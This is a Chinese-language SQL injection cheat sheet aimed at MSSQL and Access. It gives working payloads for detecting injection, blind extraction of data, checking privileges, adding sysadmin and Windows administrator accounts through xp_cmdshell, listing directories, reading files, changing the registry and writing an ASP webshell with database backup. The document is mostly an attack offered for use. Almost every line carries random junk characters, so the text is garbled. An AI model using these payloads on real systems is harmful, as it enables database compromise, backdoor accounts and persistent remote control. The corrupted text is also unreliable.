1.判断是否有注入;and 1=1 ;and 1=2 dldM hT$
2.初步判断是否是mssql ;and user>0 C"IPCJYn
0~Yg={IKhK
3.注入参数是字符'and [查询条件] and ''=' biKpV?Dp
I7BfA,mZ7
4.搜索时没过滤参数的'and [查询条件] and '%25'=' H0tjN&O_
)u\"xxcV
5.判断数据库系统 <&l3bL
A8c'CMEm
;and (select count(*) from sysobjects)>0 mssql D9#e2ex]
<po(7XB
;and (select count(*) from msysobjects)>0 access JsfbY^wz
H -.3r
A3'i
-
K{M_ 4'\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @] )a
"-v9V7KCM
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &giJO-^
f
$vGl Z<3g
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #MGZje,I
SGNi~o
9.(1)猜字段的ascii值(access) qUpMq:Uw
v{?9PRf\s
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z?j~ 2K<4
I|Z5*iXqCm
(2)猜字段的ascii值(mssql) ;EL!TzL:8
rU.ew~
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 zFB$^)v"<
z<^HohT
10.测试权限结构(mssql)
Q9%N>h9
VD36ce9
_e ~EQ[,
xOTm-Cm9L
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- .%WbXs
w:MfaN*
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- QdC>fy
#Y`U8n2F
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tTWYlbDFN
VEb}KFyP
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- CCl*v
t&0n"4$d'
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ua4QtDSs
$G*$j!
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- rf)\:75
^>9M2O['!s
;and 1=(select IS_MEMBER('db_owner'));-- n]9y Cr
{T:2+iS9:
]lZ!en
?1OS%RBF
11.添加mssql和系统的帐户 InPq1AH
;"joebZ/
;exec master.dbo.sp_addlogin username;-- R['qBHQ?
;exec master.dbo.sp_password null,username,password;-- +(cs,?`\
TmzEZ<} &7
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
x,>@IEN7
[Y'Xop6G
;exec master.dbo.xp_cmdshell 'net user username password ,a5I:V^\
DOU\X N
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- X`J~3s
/JR*X!&"
;exec master.dbo.xp_cmdshell 'net user username password /add';-- YdE$G>&em
]d% hU
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- s=U_tfpH
ZL1[Khr,s
lXv{+ic
/ x$O6gi
12.(1)遍历目录 D_@r_^}
q'K=Ly+
;create table dirs(paths varchar(100), id int) x8zUGvtQ
5<ery~q
;insert dirs exec master.dbo.xp_dirtree 'c:\' _4.`$n/Z
f>p;Jh{2fn
;and (select top 1 paths from dirs)>0 =P0~=UP
bhuA,}
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) mjB%"w!S
||qsoF5B]
sEhdkN}6
]'T-6
(2)遍历目录 e7vPiQCc
GW`9SB
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Sfh \4h$H
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 SC86+
\J9@p
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 oEKLuy
sbkWJy
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ,/o<O jR
M@8
<^CK
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ZIpL4y
=_
H$1R\rE`
EkjO4=~UC
roW8 4x
13.mssql中的存储过程 s:;!QIC5jo
nuKjp Ap!
xp_regenumvalues 注册表根键, 子键 b.C!4^
;uDH&3W
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #Q$9Eq8"[
UKk~)Of
xp_regread 根键,子键,键值名 |*OS;FD5
[",W TZ:
;exec xp_regread (y#8z6\dx
uF@Q8 7G
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 f5d"H6%L
tR0o6s@v/<
xp_regwrite 根键,子键, 值名, 值类型, 值 S
G]e^%i
]hv4EL(zi
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 `){*JPl
mv<z%y?Oj
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
Sn" 1XU
(AXSQI~y
xp_regdeletevalue 根键,子键,值名 I&R4.;LW
m:Z=: -x
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 yWt87+%T
X`^9a5<"
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 XP6R$0yN
).-B@&Eu%
1 ,[T;pdDd
!*+~R2&b
14.mssql的backup创建webshell Yz.[CmdX
hD # Yz<
use model GG%j+Ed
H%Q@DW8~@
create table cmd(str image); #N@sJyIN
*9?-JBT&F
insert into cmd(str) values (''); ~~:i+-[
G~u94rw|:
backup database model to disk='c:\l.asp'; jIAl7aoY
ZqS'xN:k
s{`r$:!
2-]gHAw%
15.mssql内置函数 8cR4@Hqx
^Zydy
;and (select @@version)>0 获得Windows的版本号 l"b78n
IqcPml{\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .CrahV1G
:m^eNS6:
;and (select user_name())>0 爆当前系统的连接用户 C!RxMccTh
GwW!Q|tVz=
;and (select db_name())>0 得到当前连接的数据库 +anNpy
&7|=8Z[o
sT'wps 2
?&"cI5-
16.简洁的webshell \7*9l%
f>-OwL($P
use model D|`[ [
lj'c0k8
create table cmd(str image); <iJ->$
)#IiHBF
insert into cmd(str) values (''); xREqcH,vU
>Y)jt*vQ
backup database model to disk='g:\wwwtest\l.asp';